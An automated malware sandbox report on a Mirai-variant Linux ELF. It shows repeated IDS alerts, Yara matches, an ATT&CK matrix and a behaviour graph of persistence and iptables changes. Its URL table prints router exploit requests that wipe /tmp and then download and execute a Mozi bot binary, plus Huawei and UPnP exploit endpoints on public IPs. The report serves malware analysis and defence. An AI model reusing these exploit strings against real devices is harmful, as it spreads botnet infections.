                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: Yara matchFile source: 6237.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6239.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: bin.sh.elf, type: SAMPLE
                            Source: Yara matchFile source: /usr/networks, type: DROPPED
                            Source: Yara matchFile source: 6239.1.00007f42f0060000.00007f42f006a000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6237.1.00007f42f0060000.00007f42f006a000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: bin.sh.elf PID: 6237, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: bin.sh.elf PID: 6239, type: MEMORYSTR
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information3
                            Scripting
                            Valid Accounts1
                            Command and Scripting Interpreter
                            1
                            Unix Shell Configuration Modification
                            1
                            Unix Shell Configuration Modification
                            1
                            Masquerading
                            1
                            OS Credential Dumping
                            11
                            Security Software Discovery
                            Remote ServicesData from Local System1
                            Encrypted Channel
                            Exfiltration Over Other Network Medium1
                            Data Manipulation
                            CredentialsDomainsDefault AccountsScheduled Task/Job3
                            Scripting
                            Boot or Logon Initialization Scripts1
                            Hide Artifacts
                            1
                            Brute Force
                            1
                            Virtualization/Sandbox Evasion
                            Remote Desktop ProtocolData from Removable Media11
                            Non-Standard Port
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                            Virtualization/Sandbox Evasion
                            Security Account Manager1
                            Remote System Discovery
                            SMB/Windows Admin SharesData from Network Shared Drive3
                            Ingress Tool Transfer
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                            File and Directory Permissions Modification
                            NTDS1
                            System Network Configuration Discovery
                            Distributed Component Object ModelInput Capture4
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Hidden Files and Directories
                            LSA Secrets11
                            File and Directory Discovery
                            SSHKeylogging5
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                            System Information Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            No configs have been found
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Number of created Files
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569630 Sample: bin.sh.elf Startdate: 06/12/2024 Architecture: LINUX Score: 100 70 158.86.239.37, 33744, 8080 NET-BAKERUS United States 2->70 72 49.251.156.129 ZAQJupiterTelecommunicationsCoLtdJP Japan 2->72 74 102 other IPs or domains 2->74 88 Suricata IDS alerts for network traffic 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 Antivirus detection for dropped file 2->92 94 6 other signatures 2->94 11 bin.sh.elf 2->11         started        signatures3 process4 process5 13 bin.sh.elf 11->13         started        process6 15 bin.sh.elf 13->15         started        file7 62 /usr/networks, ELF 15->62 dropped 64 /usr/bin/rescan-scsi-bus.sh, ASCII 15->64 dropped 66 /usr/bin/gettext.sh, ASCII 15->66 dropped 68 16 other malicious files 15->68 dropped 76 Sample tries to set files in /etc globally writable 15->76 78 Sample tries to persist itself using /etc/profile 15->78 80 Drops files in suspicious directories 15->80 82 2 other signatures 15->82 19 bin.sh.elf 15->19         started        22 bin.sh.elf sh 15->22         started        24 bin.sh.elf sh 15->24         started        26 30 other processes 15->26 signatures8 process9 signatures10 96 Opens /proc/net/* files useful for finding connected devices and routers 19->96 28 bin.sh.elf sh 19->28         started        30 bin.sh.elf sh 19->30         started        32 bin.sh.elf sh 19->32         started        43 5 other processes 19->43 34 sh killall 22->34         started        37 sh iptables 24->37         started        39 sh iptables 26->39         started        41 sh iptables 26->41         started        45 21 other processes 26->45 process11 signatures12 47 sh iptables 28->47         started        50 sh iptables 30->50         started        52 sh iptables 32->52         started        84 Terminates several processes with shell command 'killall' 34->84 86 Executes the "iptables" command to insert, remove and/or manipulate rules 37->86 54 sh iptables 43->54         started        56 sh iptables 43->56         started        58 sh iptables 43->58         started        60 2 other processes 43->60 process13 signatures14 98 Executes the "iptables" command to insert, remove and/or manipulate rules 47->98
                            SourceDetectionScannerLabelLink
                            bin.sh.elf66%ReversingLabsLinux.Trojan.Mirai
                            bin.sh.elf100%AviraEXP/ELF.Mirai.O
                            SourceDetectionScannerLabelLink
                            /usr/networks100%AviraEXP/ELF.Mirai.O
                            /etc/init.d/S95baby.sh0%ReversingLabs
                            /etc/rcS.d/S95baby.sh0%ReversingLabs
                            /usr/networks66%ReversingLabsLinux.Trojan.Mirai
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://149.73.235.181:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://36.124.164.193:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://107.96.233.143:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://100.177.119.90:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://110.132.229.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://53.85.29.79:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://70.184.104.0:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
